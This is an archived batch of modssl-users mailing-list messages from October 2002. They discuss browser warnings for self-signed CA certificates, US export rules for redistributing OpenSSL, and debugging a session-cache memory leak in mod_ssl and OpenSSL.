Received: (from brian@localhost)
	by darkstar.brie.com (8.9.3/8.9.3/Debian 8.9.3-21) id OAA06886
	for modssl-users@modssl.org; Fri, 18 Oct 2002 14:52:10 -0700
Date: Fri, 18 Oct 2002 14:52:10 -0700
From: Brian Lavender 
To: modssl-users@modssl.org
Subject: Get rid of Warning in Netscape browser?
Message-ID: <20021018145210.A6851@brie.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brian Lavender 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Couple questions.

Is there a way to get rid of the message from Netscape when using your
own CA?

Do you need to specify your own CA in the httpd.conf?

Here are the details to my questions:

I followed Jose's instructions:

http://www.mail-archive.com/openssl-users%40openssl.org/msg28391.html

on creating my own CA and user certificate, but when I pop up my web
server using my Netscape browser, it still gives the warning.

I thought the whole purpose of creating the CA, the server cert, the
user's cert was so the the browser would accept the server's public
key without issuing warning. 

I am also wondering about a couple apache directives and if they are
relevent and if I put the directives in the correct way.

SLCACertificatePath /home/blavende/project/mefg/CA/demoCA
SSLCACertificateFile /home/blavende/project/mefg/CA/demoCA/cacert.pem

Here is my directory structure of my CA.

/home/blavende/project/mefg/CA/demoCA
/home/blavende/project/mefg/CA/demoCA/certs
/home/blavende/project/mefg/CA/demoCA/crl
/home/blavende/project/mefg/CA/demoCA/newcerts
/home/blavende/project/mefg/CA/demoCA/newcerts/01.pem
/home/blavende/project/mefg/CA/demoCA/newcerts/02.pem
/home/blavende/project/mefg/CA/demoCA/private
/home/blavende/project/mefg/CA/demoCA/private/cakey.pem
/home/blavende/project/mefg/CA/demoCA/serial
/home/blavende/project/mefg/CA/demoCA/index.txt
/home/blavende/project/mefg/CA/demoCA/cacert.pem
/home/blavende/project/mefg/CA/demoCA/serial.old
/home/blavende/project/mefg/CA/demoCA/index.txt.old

brian
-- 
Brian Lavender
http://www.brie.com/brian/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 19 02:15:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA25627; Sat, 19 Oct 2002 02:14:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.brie.com id CAA25621; Sat, 19 Oct 2002 02:13:48 +0200 (MET DST)
Received: (from brian@localhost)
	by darkstar.brie.com (8.9.3/8.9.3/Debian 8.9.3-21) id RAA07241
	for modssl-users@modssl.org; Fri, 18 Oct 2002 17:13:46 -0700
Date: Fri, 18 Oct 2002 17:13:45 -0700
From: Brian Lavender 
To: modssl-users@modssl.org
Subject: Makefile for client keys
Message-ID: <20021018171345.C7133@brie.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brian Lavender 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

For the SSLCACertificatePath directive, it mentions that you must
use a Makefile to create the indexes. Where do I find this 
Makefile?

http://www.modssl.org/docs/2.8/ssl_reference.html#ToC13

brian
-- 
Brian Lavender
http://www.brie.com/brian/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 19 07:43:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA02862; Sat, 19 Oct 2002 07:42:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx3.ust.hk id HAA02858; Sat, 19 Oct 2002 07:41:51 +0200 (MET DST)
Received: from ust.hk (ccz330.ust.hk [143.89.103.167])
	by mx3.ust.hk (8.12.5/8.12.5) with ESMTP id g9J5fj7u044647
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NOT);
	Sat, 19 Oct 2002 13:41:46 +0800 (HKT)
X-Authentication-Warning: mx3.ust.hk: Host ccz330.ust.hk [143.89.103.167] claimed to be ust.hk
Message-ID: <3DB0F099.5040309@ust.hk>
Date: Sat, 19 Oct 2002 13:41:45 +0800
From: Leung Ming Tak 
Organization: HKUST
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Makefile for client keys
References: <20021018171345.C7133@brie.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Leung Ming Tak 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Brian Lavender wrote:
> For the SSLCACertificatePath directive, it mentions that you must
> use a Makefile to create the indexes. Where do I find this 
> Makefile?

pkg.sslcfg/Makefile.crt

> 
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC13
> 
> brian


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 19 09:21:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA05165; Sat, 19 Oct 2002 09:20:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.brie.com id JAA05152; Sat, 19 Oct 2002 09:19:41 +0200 (MET DST)
Received: (from brian@localhost)
	by darkstar.brie.com (8.9.3/8.9.3/Debian 8.9.3-21) id AAA07940
	for modssl-users@modssl.org; Sat, 19 Oct 2002 00:19:39 -0700
Date: Sat, 19 Oct 2002 00:19:39 -0700
From: Brian Lavender 
To: modssl-users@modssl.org
Subject: Eliminate warning message from Netscape?
Message-ID: <20021019001939.A7930@brie.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brian Lavender 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is there a way to eliminate the warning message from Netscape
when you sign keys with your own CA?

I am still getting the warning message when I connect to my
Apache modssl server using Netscape after creating a server
key and signing it with my own CA. 

brian
-- 
Brian Lavender
http://www.brie.com/brian/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 19 10:47:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA07076; Sat, 19 Oct 2002 10:46:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from scanmail2.cableone.net id KAA07071; Sat, 19 Oct 2002 10:45:13 +0200 (MET DST)
Received: from scanmail2.cableone.net ([10.116.0.122]) by scanmail2.cableone.net  with Microsoft SMTPSVC(5.5.1877.687.68);
	 Sat, 19 Oct 2002 01:36:39 -0700
Received: from scanmail2.cableone.net [24.116.0.122] by scanmail2.cableone.net
  (SMTPD32-7.04) id A97641200E0; Sat, 19 Oct 2002 01:36:06 -0700
Received: from  (183-134.twicpe.cableone.net [24.116.183.134]) by mail.cableone.net with SMTP (MailShield v2.04 - WIN32 Jul 17 2001 17:12:42); Sat, 19 Oct 2002 01:36:05 -0600
Message-Id: <5.1.1.6.0.20021019024123.00a07df0@mail.developersdesk.com>
X-Sender: apache%developersdesk.com@mail.developersdesk.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Sat, 19 Oct 2002 02:45:04 -0600
To: modssl-users@modssl.org, modssl-users@modssl.org
From: Rick Widmer 
Subject: Re: Eliminate warning message from Netscape?
In-Reply-To: <20021019001939.A7930@brie.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-SMTP-HELO: robinton.developersdesk.com
X-SMTP-MAIL-FROM: apache@developersdesk.com
X-SMTP-PEER-INFO: 183-134.twicpe.cableone.net [24.116.183.134]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rick Widmer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 12:19 AM 10/19/02 -0700, Brian Lavender wrote:
>Is there a way to eliminate the warning message from Netscape
>when you sign keys with your own CA?

For your browser, you should be able to stop the warning by
accepting the certificate forever.  Each customer will have
to be convinced to do the same.



>I am still getting the warning message when I connect to my
>Apache modssl server using Netscape after creating a server
>key and signing it with my own CA.


The warning should be that the certificate is not signed by a
CA that is in the list of known certificates that come with
Netscape.  The only way to eliminate it for everyone without
trying to convince each individual hitting the site to accept
your certificate is to buy a certificate from a CA that is in
the list.

Rick

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 19 15:29:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA13439; Sat, 19 Oct 2002 15:28:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-m09.mx.aol.com id PAA13430; Sat, 19 Oct 2002 15:27:03 +0200 (MET DST)
From: camccuk@netscape.net
Received: from camccuk@netscape.net
	by imo-m09.mx.aol.com (mail_out_v34.13.) id m.1f.562defa (16238)
	 for ; Sat, 19 Oct 2002 09:26:55 -0400 (EDT)
Received: from  netscape.net (mow-d07.webmail.aol.com [205.188.138.71]) by air-in03.mx.aol.com (v89.12) with ESMTP id MAILININ32-1019092655; Sat, 19 Oct 2002 09:26:55 -0400
Date: Sat, 19 Oct 2002 09:29:26 -0400
To: modssl-users@modssl.org
Subject: Re: Using subjectAltName
MIME-Version: 1.0
Message-ID: <3C5681ED.23D3A9D3.001D8163@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: camccuk@netscape.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Joe Orton  wrote:

>Hi - you might be better of asking these questions on the openssl-users
>list.
>
>On Thu, Oct 10, 2002 at 10:18:48AM -0400, camccuk@netscape.net wrote:
>..
>> x509_extensions                                 = usr_cert
>
>This looks like a simple typo, the above requires a section called
>'usr_cert', yet you've actually named the section "user_cert".

Ouch. Cleaned it up for posting - I can confirm that even when correctly spelled, this fails to insert the field into the certificate. A cert is generated but when examined doesn't appear to have any extra fields.

Point taken that this might be slightly OT and I shall try openssl lists.

Thanks for the reply,

cam
-----------------------------------------
camccuk@netscape.net


__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 19 19:05:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18571; Sat, 19 Oct 2002 19:04:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id TAA18563; Sat, 19 Oct 2002 19:03:17 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g9JGudIR002033
	for ; Sat, 19 Oct 2002 12:56:41 -0400
Date: Sat, 19 Oct 2002 12:56:39 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: distributing encryption software (fwd)
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Because so many of you have asked, here is the answer.

--Cliff


---------- Forwarded message ----------
Date: Sat, 19 Oct 2002 02:56:40 -0700
From: Roy T. Fielding 
Reply-To: dev@httpd.apache.org
To: dev@httpd.apache.org
Subject: distributing encryption software

Ryan asked for a clarification about whether or not we have the ability
to redistribute SSL binaries for win32.

Last year, the board hired a lawyer to give us an opinion on whether
we can distribute encryption software, or hooks to such software.
The exact opinion we got back is, unfortunately, not online, but it
is essentially the same (with less detail) as the one given to Debian
and visible at .  Basically,
we have the right to distribute encryption software in source or
executable form if we also distribute that same software as open
source for free to the public, provided we first notify the U.S.
authorities once per new encryption-enabled product.

This is sufficient for Debian because they distribute the source code
to everything in Debian within a single repository.  Note, however,
that we do not do the same for OpenSSL.  Not only is OpenSSL not in
our CVS, but it isn't normally distributed by us at all, and the
authors of OpenSSL aren't likely to want us to distribute it because
doing so pollutes the recipients rights with U.S. crypto controls
whereas they could simply grab the same distribution from the origin
and not be polluted.

I think that Bill Rowe at one point requested that we seek out a
lawyer's opinion on this specific matter, but that was not followed
through by the board because we already know the legal aspects.
The issue isn't legal -- it is social.  We can download a released
version of OpenSSL, compile it, and make both available from our
website provided we first notify the BXA as described in the Debian
opinion above.  However, it is still preferable for our users to
get the DLL themselves, from a distribution outside the U.S., and
avoid having to maintain our distribution of OpenSSL up-to-date.

I think a reasonable and defensible compromise would be to make
it part of the win32 installation script -- to select no SSL or,
if SSL is selected, to guide/automate the user in downloading an
appropriate DLL from some other site.  Besides, that would allow
the user to pick some other SSL library, such as one of the
optimized ones available commercially that may already be
installed on their system.  There is such a thing as being too
concerned about "ease of installation."

Finally, it should also be noted that the exception for Apache ONLY
applies to non-commercial distributions.  Any commercial distribution,
even if it is simply Apache slapped onto a CD and sold for a buck,
remains subject to the old US export controls that everyone hates,
and must be approved via a separate process.

....Roy


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct 20 12:47:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA10636; Sun, 20 Oct 2002 12:46:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id MAA10632; Sun, 20 Oct 2002 12:45:18 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9KAj6iX008045;
	Sun, 20 Oct 2002 12:45:07 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9KAj23Q008044;
	Sun, 20 Oct 2002 12:45:02 +0200 (IST)
Date: Sun, 20 Oct 2002 12:45:02 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Subject: Re: Memory leak in session caching?
Message-ID: <20021020104502.GA7903@fermat.math.technion.ac.il>
References: <20021018004158.GA9550@fermat.math.technion.ac.il> <200210172241.54084.geoff@geoffthorpe.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200210172241.54084.geoff@geoffthorpe.net>
User-Agent: Mutt/1.4i
Hebrew-Date: 14 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Oct 17, 2002, Geoff Thorpe wrote about "Re: Memory leak in session caching?":
> On Thursday 17 Oct 2002 8:41 pm, Nadav Har'El wrote:
> > I've come across an apparent bug that I'm surprised no-one come
> > across before: Mod_ssl's SSL-session cache handling, both the shmht
> > and shmcb variants, leaks memory. Not directly (there's no alloc
> > calls in shmcb), but memory is definitely leaked.
> >
> > Is this a known bug?
> 
> I saw your related email on the openssl lists recently but have not had 
> the time to reply (and search out the necessary links). Anyway, this 
> may not do it justice, but w.r.t. turning of process-local 
> openssl-internal cachine, see the following;
>    http://marc.theaimsgroup.com/?l=apache-modssl&m=99717585106420&w=2
> 
> The issue isn't just memory footprint (though you're right, that can 
> also become an unecessary issue) but in fact is security as well. If a 
>...
> This has apparently been fixed in Apache 2 but hasn't (IIRC) in mod_ssl. 
> I mentioned it more than once, so I've given up.

Thanks. I do think your security concern is correct and mod_ssl should be
changed like you recommended. But security is obviously secondary to the
program actually working, and in the setup I'm trying the memory waste is
too big to ignore, unfortunately. (by the way, as I said, I may be barking
at the wrong tree: I wasn't able to prove yet that the entire "memory leak"
is indeed the internal session cache).

If I understand correctly, both your suggestion and the Apache 2 code
simply uses SSL_SESS_CACHE_NO_INTERNAL_LOOKUP in
SSL_CTX_set_session_cache_mode(), so that the per-process ("internal")
cache does not get looked into.
Too bad we can't tell OpenSSL also not to *put* stuff in that cache, or at
least I couldn't figure out how to do that. A question I sent about that to
the openssl list remained unanswered.
Frankly, I don't understand why that OpenSSL option exists at all. Why would
anyone want to populate a cache that (s)he will never use?


-- 
Nadav Har'El                        |     Sunday, Oct 20 2002, 14 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |How long a minute depends on what side of
http://nadav.harel.org.il           |the bathroom door you're on.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct 20 19:48:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA19481; Sun, 20 Oct 2002 19:47:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR002.sc1.videotron.ca id TAA19476; Sun, 20 Oct 2002 19:46:53 +0200 (MET DST)
Received: from dopey.geoffnet ([24.202.196.188])
 by VL-MS-MR002.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H4A00G1NK22DU@VL-MS-MR002.sc1.videotron.ca> for
 modssl-users@modssl.org; Sun, 20 Oct 2002 13:46:51 -0400 (EDT)
Date: Sun, 20 Oct 2002 13:46:48 -0400
From: Geoff Thorpe 
Subject: Re: Memory leak in session caching?
In-reply-to: <20021020104502.GA7903@fermat.math.technion.ac.il>
To: modssl-users@modssl.org
Message-id: <200210201346.48509.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
User-Agent: KMail/1.4.3
References: <20021018004158.GA9550@fermat.math.technion.ac.il>
 <200210172241.54084.geoff@geoffthorpe.net>
 <20021020104502.GA7903@fermat.math.technion.ac.il>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Sunday 20 Oct 2002 6:45 am, Nadav Har'El wrote:
> Thanks. I do think your security concern is correct and mod_ssl should
> be changed like you recommended. But security is obviously secondary
> to the program actually working, and in the setup I'm trying the
> memory waste is too big to ignore, unfortunately. (by the way, as I
> said, I may be barking at the wrong tree: I wasn't able to prove yet
> that the entire "memory leak" is indeed the internal session cache).

Actually security is paramount, otherwise mod_ssl has no purpose at
all. Apache can actually cope with memory leaks pretty well so that it's
stability is not dependant on the perfect functioning of all its
modules. You just kill off child processes after they've served some
maximum number of requests (just set the "MaxRequestsPerChild" or
whatever it's called). An administrator can not, on the other hand,
cope with a security breach that could have been prevented had the
software done what it was supposed to do - which in this case is, after
all, to provide security!

> If I understand correctly, both your suggestion and the Apache 2 code
> simply uses SSL_SESS_CACHE_NO_INTERNAL_LOOKUP in
> SSL_CTX_set_session_cache_mode(), so that the per-process ("internal")
> cache does not get looked into.

Yup.

> Too bad we can't tell OpenSSL also not to *put* stuff in that cache,

Are you sure that it is storing sessions in an internal cache when that
flag is set?

> or at least I couldn't figure out how to do that. A question I sent
> about that to the openssl list remained unanswered.

I do hacking inside the "ssl/" tree as/when I absolutely have to and
otherwise keep myself more happily occupied in the "crypto/" tree - I
don't pretend to have the whole SSL/TLS implementation groked nor do I
pretend that the code in its current form can all be justified, however
it works pretty well in general and has undergone more bashing (in both
source and executable senses) than pretty much any other implementation.
So we mess with it when we must rather than when we think we can. :-)

> Frankly, I don't understand why that OpenSSL option exists at all. Why
> would anyone want to populate a cache that (s)he will never use?

As I say, are you sure that sessions are being stored in the SSL_CTX
cache when the SSL_SESS_CACHE_NO_INTERNAL_LOOKUP flag is set? If I find
time, I'll try and dig back through the openssl list mail and take a
closer look at your post - but I guarantee nothing right now. If you
have evidence that bad (or stupid) things are happening, please take the
analysis as far as you can and point us to a concise summary of the
problem - and if you're feeling very kind, a "diff -u" patch to fix the
problem wouldn't go amiss either. If you already did any/all of that, my
apologies - I'll see what I can do.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 21 01:54:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA29034; Mon, 21 Oct 2002 01:53:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id BAA29029; Mon, 21 Oct 2002 01:52:34 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9KNqSiX017114;
	Mon, 21 Oct 2002 01:52:32 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9KNqQcm017113;
	Mon, 21 Oct 2002 01:52:26 +0200 (IST)
Date: Mon, 21 Oct 2002 01:52:26 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Subject: Re: Memory leak in session caching?
Message-ID: <20021020235226.GA16638@fermat.math.technion.ac.il>
References: <20021018004158.GA9550@fermat.math.technion.ac.il> <200210172241.54084.geoff@geoffthorpe.net> <20021020104502.GA7903@fermat.math.technion.ac.il> <200210201346.48509.geoff@geoffthorpe.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200210201346.48509.geoff@geoffthorpe.net>
User-Agent: Mutt/1.4i
Hebrew-Date: 15 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sun, Oct 20, 2002, Geoff Thorpe wrote about "Re: Memory leak in session caching?":
> Actually security is paramount, otherwise mod_ssl has no purpose at
> all. Apache can actually cope with memory leaks pretty well so that it's
> stability is not dependant on the perfect functioning of all its
> modules. You just kill off child processes after they've served some
> maximum number of requests (just set the "MaxRequestsPerChild" or

You're absolutely right. The limit I had set (1000) was too high for my
case, but setting a lower limit would have worked (at some small cost of
performance because of all that extra forking/killing).

> > Too bad we can't tell OpenSSL also not to *put* stuff in that cache,
> 
> Are you sure that it is storing sessions in an internal cache when that
> flag is set?

Well, the SSL_CTX_set_session_cache_mode(3) manual says about
SSL_SESS_CACHE_NO_INTERNAL_LOOKUP that:

   "By setting this flag sessions are cached in the internal storage but
    they are not looked up automatically. ..."

Which is why I assumed that it still caches sessions, even if it doesn't
look them up.

To make sure that the internal cache is indeed being filled up, I tried
a simple experiment: In the NewSessionCacheEntry callback I added code that
printed the current size of the internal cache. I printed:
	lh_num_items(ssl->ctx->sessions)
and a second method (counting the linked list instead of the hash table)
	int n1 = 0;
	SSL_SESSION *s;
	for (s=ssl->ctx->session_cache_head; s; s=s->next)
		n1++;
and to check that I didn't forget setting SSL_SESS_CACHE_NO_INTERNAL_LOOKUP
I also printed
	ssl->ctx->session_cache_mode&SSL_SESS_CACHE_NO_INTERNAL_LOOKUP
	
I than ran several requests (using curl, so sessions were never resumed),
and sure enough, after 7 requests (to only one server process) I saw a
message like

	items in ssl->ctx->sessions: 7
	second algorithm: 8
	ssl->ctx->session_cache_mode&NO_INTERNAL_LOOKUP: 100

(I don't know where that 8th session came from...).

I did check, by the way, that SSL_SESS_CACHE_NO_INTERNAL_LOOKUP prevented
the internal lookup. At least that :) (so this is indeed a solution to
the security problem you raised)

> > Frankly, I don't understand why that OpenSSL option exists at all. Why
> > would anyone want to populate a cache that (s)he will never use?
> 
> As I say, are you sure that sessions are being stored in the SSL_CTX
> cache when the SSL_SESS_CACHE_NO_INTERNAL_LOOKUP flag is set? If I find
> time, I'll try and dig back through the openssl list mail and take a
> closer look at your post - but I guarantee nothing right now. If you

I did that digging earlier today.
Here is what I found. Note that I'm a very small OpenSSL expert (read:
not at all), so take my analysis with a pound (not just a grain :)) of salt.

In short, I found that SSL_SESS_CACHE_NO_INTERNAL_LOOKUP doesn't always
prevent the internal session cached from being filled.
In long,

The relevant functions in OpenSSL are: (I looked at openssl-engine-0.9.6g)
        SSL_CTX_add_session     (ssl/ssl_sess.c)
        ssl_update_cache()      (ssl/ssl_lib.c)
        ssl_get_prev_session in (ssl/ssl_sess.c)

SSL_CTX_add_session() (ssl_sess.c) is the function that actually adds a
session to the internal cache. It always does it's job - it doesn't
check session_cache_mode flags before doing it.

So the question is whether this function is called when the flag
SSL_SESS_CACHE_NO_INTERNAL_LOOKUP is set.

SSL_CTX_add_session() is only called in two places in OpenSSL: in
ssl_update_cache() (ssl_lib.c) and in ssl_get_prev_session() (ssl_sess.c).
So now we need to check if those functions check the
SSL_SESS_CACHE_NO_INTERNAL_LOOKUP flag or not.

ssl_update_cache() (called when OpenSSL creates a new, not resumed, session)
indeed *appears* not to call SSL_CTX_add_session() when 
SSL_SESS_CACHE_NO_INTERNAL_LOOKUP is on. This fits your guess, contradicts
what the manual page says, and also seems to contradict with the experiment
I outlined above - I can't explain it...

The second function, ssl_get_prev_session() (called to fetch a session
with an existing id), however, calls SSL_CTX_add_session WITHOUT first
checking the NO_INTERNAL_LOOKUP flag! So when an answer
is fetched from the external cache, it is also cached in the internal
cache regardless of the NO_INTERNAL_LOOKUP flag.

So to sum it up, I belive NO_INTERNAL_LOOKUP does not consistently
prevent sessions from being entered into the cache; According to my
experiment (which is not backed by firm understanding the source code,
unfortunately) even in cases (new sessions) when sessions should apparently
not be cached in the internal cache, they do end up being cached.

I'm baffled, I have to admit. It will probably take a bigger OpenSSL expert
than me to fully understand this.

> have evidence that bad (or stupid) things are happening, please take the
> analysis as far as you can and point us to a concise summary of the
> problem - and if you're feeling very kind, a "diff -u" patch to fix the
> problem wouldn't go amiss either. If you already did any/all of that, my
> apologies - I'll see what I can do.

I will continue researching this a bit, and will post here patches if
I finally find a working one. The next thing I'm thinking of trying is
to make the SSL_CTX_add_session() function itself (the function that
physically puts the session in the internal cache) check the NO_INTERNAL_LOOKUP
flag, not doing anything if that flag is on. Of course, that would
contradict with the manual - perhaps a new flag is needed... But that
is getting deep OpenSSL territory - I'll probably need to suggest such a
patch to the OpenSSL people.

Thanks,
	Nadav.

-- 
Nadav Har'El                        |     Monday, Oct 21 2002, 15 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |Lottery: A tax on people who are bad at
http://nadav.harel.org.il           |math.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 21 09:34:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA10527; Mon, 21 Oct 2002 09:33:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id JAA10523; Mon, 21 Oct 2002 09:33:05 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 9F65F2AD7
	for ; Mon, 21 Oct 2002 09:33:04 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 039642D02; Mon, 21 Oct 2002 09:33:01 +0200 (METDST)
Date: Mon, 21 Oct 2002 09:33:01 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Memory leak in session caching?
Message-ID: <20021021073301.GB3354@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20021018004158.GA9550@fermat.math.technion.ac.il> <200210172241.54084.geoff@geoffthorpe.net> <20021020104502.GA7903@fermat.math.technion.ac.il> <200210201346.48509.geoff@geoffthorpe.net> <20021020235226.GA16638@fermat.math.technion.ac.il>
Mime-Version: 1.0
